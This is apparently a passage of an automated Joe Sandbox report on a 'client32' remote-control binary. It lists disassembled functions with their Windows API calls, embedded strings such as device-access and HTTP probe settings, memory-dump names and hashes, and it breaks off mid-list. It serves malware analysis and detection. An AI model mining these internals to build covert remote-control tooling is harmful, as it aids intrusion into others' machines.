                                                                                                                                        • SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103D206
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                        • API String ID: 4104443479-1830555902
                                                                                                                                        • Opcode ID: 716790659bc5e28ebd22f7d0de68d033308c6e41a7c472bc21094ad78cf4f8bb
                                                                                                                                        • Instruction ID: 0533b61ff5f256c00753904ec1df5a7198c5ed9dcfad6114a4b50a325be8fdd6
                                                                                                                                        • Opcode Fuzzy Hash: 716790659bc5e28ebd22f7d0de68d033308c6e41a7c472bc21094ad78cf4f8bb
                                                                                                                                        • Instruction Fuzzy Hash: BE41B779A1021AAFCB01CF94CC90FEEB7F8EF55319F044569E855A7241EB35E904C7A1
                                                                                                                                        Function 1114F1D0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 128windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 1114F203
                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 1114F219
                                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 1114F2FF
                                                                                                                                        • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 1114F327
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 1114F33B
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 1114F361
                                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 1114F371
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 1114F378
                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 1114F387
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
                                                                                                                                        • String ID: @Ls
                                                                                                                                        • API String ID: 602542589-4225762999
                                                                                                                                        • Opcode ID: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
                                                                                                                                        • Instruction ID: f8b28bdea48ec2611b1f91f2bbafde9b68da4a4719e2569757cfb30afdba7c1c
                                                                                                                                        • Opcode Fuzzy Hash: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
                                                                                                                                        • Instruction Fuzzy Hash: 7851DAF5E012299FDB60DF28CD8479DBBB9EF88604F5091EAE609E3240D7705A81CF59
                                                                                                                                        Function 1104B12F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 126windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                        • PostMessageA.USER32(0000FFFF,0000C15F,00000000,00000000), ref: 1104B225
                                                                                                                                        • PostMessageA.USER32(0001044C,0000048F,00000032,00000000), ref: 1104B256
                                                                                                                                        • PostMessageA.USER32(0001044C,00000483,00000000,00000000), ref: 1104B268
                                                                                                                                        • PostMessageA.USER32(0001044C,0000048F,000000C8,00000000), ref: 1104B27C
                                                                                                                                        • PostMessageA.USER32(0001044C,00000483,00000001,?), ref: 1104B293
                                                                                                                                        • PostMessageA.USER32(0001044C,00000800,00000000,00000000), ref: 1104B2A4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost$__wcstoi64
                                                                                                                                        • String ID: Client$UnloadMirrorOnEndView$tVPq
                                                                                                                                        • API String ID: 1802880851-2026197083
                                                                                                                                        • Opcode ID: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
                                                                                                                                        • Instruction ID: 72b0dfb70f0a874fb1e004092d90b5695b323917c743566986231bfe2b7fd1fa
                                                                                                                                        • Opcode Fuzzy Hash: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
                                                                                                                                        • Instruction Fuzzy Hash: E6412775B025257BD311DBA4CC85FEBB7AABF89708F1081A9F61497284DB70B900CBD4
                                                                                                                                        Function 68907810 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 125networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memmove.LIBCMT ref: 6890783E
                                                                                                                                        • #16.WSOCK32(?,?,?,00000000), ref: 689078F6
                                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 68907924
                                                                                                                                        • wsprintfA.USER32 ref: 68907937
                                                                                                                                        • OutputDebugStringA.KERNEL32(?), ref: 68907944
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DebugErrorLastOutputString_memmovewsprintf
                                                                                                                                        • String ID: $(Httputil.c) Error %d reading HTTP response header$hbuf->data$httputil.c
                                                                                                                                        • API String ID: 2214935655-769711038
                                                                                                                                        • Opcode ID: 6b55fe3e7b05f5130deffd2513c3b15d327cdbe1c71d77648d102975681e9eef
                                                                                                                                        • Instruction ID: 2f61cffe9041ed912316b2d66fab2e1e69b47a01639e0f51311a7c78d351ec7a
                                                                                                                                        • Opcode Fuzzy Hash: 6b55fe3e7b05f5130deffd2513c3b15d327cdbe1c71d77648d102975681e9eef
                                                                                                                                        • Instruction Fuzzy Hash: 69419879A04605AFD720DF68CD45E6BB7F9EF59318B40882DE89AC7641E731F805CB90
                                                                                                                                        Function 688F6A40 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 114libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(wininet.dll,00002000,00000000,00000000), ref: 688F6ABD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InternetQueryOptionA), ref: 688F6ACF
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 688F6AFC
                                                                                                                                        • wsprintfA.USER32 ref: 688F6B52
                                                                                                                                        • _free.LIBCMT ref: 688F6B96
                                                                                                                                        • _free.LIBCMT ref: 688F6BA2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library_free$AddressFreeLoadProcwsprintf
                                                                                                                                        • String ID: InternetQueryOptionA$http://%s/testpage.htm$wininet.dll
                                                                                                                                        • API String ID: 3641295650-227718810
                                                                                                                                        • Opcode ID: 2f09ae26c82d8b9e88b98911f9d4c5b76b532e6487f8d598db5cc9b9c432ec87
                                                                                                                                        • Instruction ID: 102c9458aa23025adb650e34eca4ace05f6362fafded5e2fc6255d3994d47d5d
                                                                                                                                        • Opcode Fuzzy Hash: 2f09ae26c82d8b9e88b98911f9d4c5b76b532e6487f8d598db5cc9b9c432ec87
                                                                                                                                        • Instruction Fuzzy Hash: 6F414271D0412E9BDB24CF68CD81BEEB7B8AB55304F4085E9E91DA7600EB709E859F90
                                                                                                                                        Function 68910380 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111synchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,27CEFB69,?,?,?,?,?,6892F1E8,000000FF), ref: 689103CA
                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,000000FF), ref: 68910415
                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,000000FF), ref: 6891043E
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,000000FF), ref: 68910472
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,000000FF), ref: 68910480
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,000000FF), ref: 6891048D
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893D004,?,?,?,000000FF), ref: 689104CE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$CloseHandle$DeleteEnterEventLeaveObjectSingleWait
                                                                                                                                        • String ID: Refcount.cpp$idata->Q.size () == 0
                                                                                                                                        • API String ID: 2474944948-1089602151
                                                                                                                                        • Opcode ID: 177109e02c6470fc712c7bce32ae8987bb768c65380fa6a286ca2c8b3101410d
                                                                                                                                        • Instruction ID: 84ffcbad33d7a7cd5e05bf696c80f883c5b188dbac01ce221a9d2893809e554e
                                                                                                                                        • Opcode Fuzzy Hash: 177109e02c6470fc712c7bce32ae8987bb768c65380fa6a286ca2c8b3101410d
                                                                                                                                        • Instruction Fuzzy Hash: BF419275A0CB28EFCB34DF64D9C592E77A8FB5A318B40062DE55A93780E731E800CB95
                                                                                                                                        Function 688F97C0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 67threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 688F97D4
                                                                                                                                        • wsprintfA.USER32 ref: 688F97F3
                                                                                                                                        • OutputDebugStringA.KERNEL32(?), ref: 688F9803
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 688F982D
                                                                                                                                        • SetEvent.KERNEL32(00000310), ref: 688F98A5
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F98B0
                                                                                                                                        Strings
                                                                                                                                        • currentThreadId == sv.recv_thread_id, xrefs: 688F981B
                                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 688F9816
                                                                                                                                        • HTCTL32: FAULT in CacheRecvFDs() - currentThreadId: %x, sv.recv_thread_id: %x, xrefs: 688F97ED
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$CurrentDebugEnterEventLeaveOutputStringThreadwsprintf
                                                                                                                                        • String ID: HTCTL32: FAULT in CacheRecvFDs() - currentThreadId: %x, sv.recv_thread_id: %x$currentThreadId == sv.recv_thread_id$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                                                        • API String ID: 229818198-630143122
                                                                                                                                        • Opcode ID: aa4de58b55c4c489c04ffee154a5d38c570dfa42ebc57bb3cc1d7ceae01920a0
                                                                                                                                        • Instruction ID: 456294bca59f7b6e0cadd86b781028c7f18f0a6a17f477acb7693f052e7f1316
                                                                                                                                        • Opcode Fuzzy Hash: aa4de58b55c4c489c04ffee154a5d38c570dfa42ebc57bb3cc1d7ceae01920a0
                                                                                                                                        • Instruction Fuzzy Hash: FB21CF7190C920EFDF34EF68CC54AAD77F4EB8A345F814568E80AE3640DB309941CBA1
                                                                                                                                        Function 68900450 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                        • API String ID: 2168136238-4289949731
                                                                                                                                        • Opcode ID: 7d942799b058f433e95c9a2c6564bd831fc5c701781dc2b3e7a22008f99e973f
                                                                                                                                        • Instruction ID: 085a7b3aca03725785034b7472008763ebebb608879a578e9fccad3683b910d8
                                                                                                                                        • Opcode Fuzzy Hash: 7d942799b058f433e95c9a2c6564bd831fc5c701781dc2b3e7a22008f99e973f
                                                                                                                                        • Instruction Fuzzy Hash: 4E51D7327141059BD724CE1DD880A6FB3EBEBC5714BA08A2EE895CB385EB70DC518791
                                                                                                                                        Function 6890CE00 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 6890CE20
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 68911928
                                                                                                                                          • Part of subcall function 68911913: __CxxThrowException@8.LIBCMT ref: 6891193D
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 6891194E
                                                                                                                                        • _memmove.LIBCMT ref: 6890CEA7
                                                                                                                                        • _memmove.LIBCMT ref: 6890CECB
                                                                                                                                        • _memmove.LIBCMT ref: 6890CF05
                                                                                                                                        • _memmove.LIBCMT ref: 6890CF21
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6890CF6B
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6890CF80
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                        • String ID: deque<T> too long
                                                                                                                                        • API String ID: 827257264-309773918
                                                                                                                                        • Opcode ID: fe1e7a24f15218788d1fabe62cbabcda65a584b34750cc04b3d1b2dcb37a28ac
                                                                                                                                        • Instruction ID: 5f23da67c9c30f50b397e482afb79f99f3e52130539e089ec17fbd5d4d6a5d8e
                                                                                                                                        • Opcode Fuzzy Hash: fe1e7a24f15218788d1fabe62cbabcda65a584b34750cc04b3d1b2dcb37a28ac
                                                                                                                                        • Instruction Fuzzy Hash: FD41DB72E04105ABDB04CE6CCC81AAEB7B9EFD4218F59866CD919D7344E734EE01C7A1
                                                                                                                                        Function 688F3E90 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 688F3EB0
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 68911928
                                                                                                                                          • Part of subcall function 68911913: __CxxThrowException@8.LIBCMT ref: 6891193D
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 6891194E
                                                                                                                                        • _memmove.LIBCMT ref: 688F3F39
                                                                                                                                        • _memmove.LIBCMT ref: 688F3F5D
                                                                                                                                        • _memmove.LIBCMT ref: 688F3F97
                                                                                                                                        • _memmove.LIBCMT ref: 688F3FB3
                                                                                                                                        • std::exception::exception.LIBCMT ref: 688F3FFD
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 688F4012
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                        • String ID: deque<T> too long
                                                                                                                                        • API String ID: 827257264-309773918
                                                                                                                                        • Opcode ID: 7690ffd04ff2ee4cd3e99d8b1d76377d35e2bc08d85cca9dd1b34a561d9e7919
                                                                                                                                        • Instruction ID: c112131864b3bab94c79ec1318e8555293c1c8dc4085821b4137e6c575e45291
                                                                                                                                        • Opcode Fuzzy Hash: 7690ffd04ff2ee4cd3e99d8b1d76377d35e2bc08d85cca9dd1b34a561d9e7919
                                                                                                                                        • Instruction Fuzzy Hash: 7841D672E04108ABDB04CF68CC81AAEB7B6EF90254F598668EC18D7744E735EE018B91
                                                                                                                                        Function 6890A6C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 6890A6E0
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 68911928
                                                                                                                                          • Part of subcall function 68911913: __CxxThrowException@8.LIBCMT ref: 6891193D
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 6891194E
                                                                                                                                        • _memmove.LIBCMT ref: 6890A76A
                                                                                                                                        • _memmove.LIBCMT ref: 6890A78E
                                                                                                                                        • _memmove.LIBCMT ref: 6890A7C8
                                                                                                                                        • _memmove.LIBCMT ref: 6890A7E4
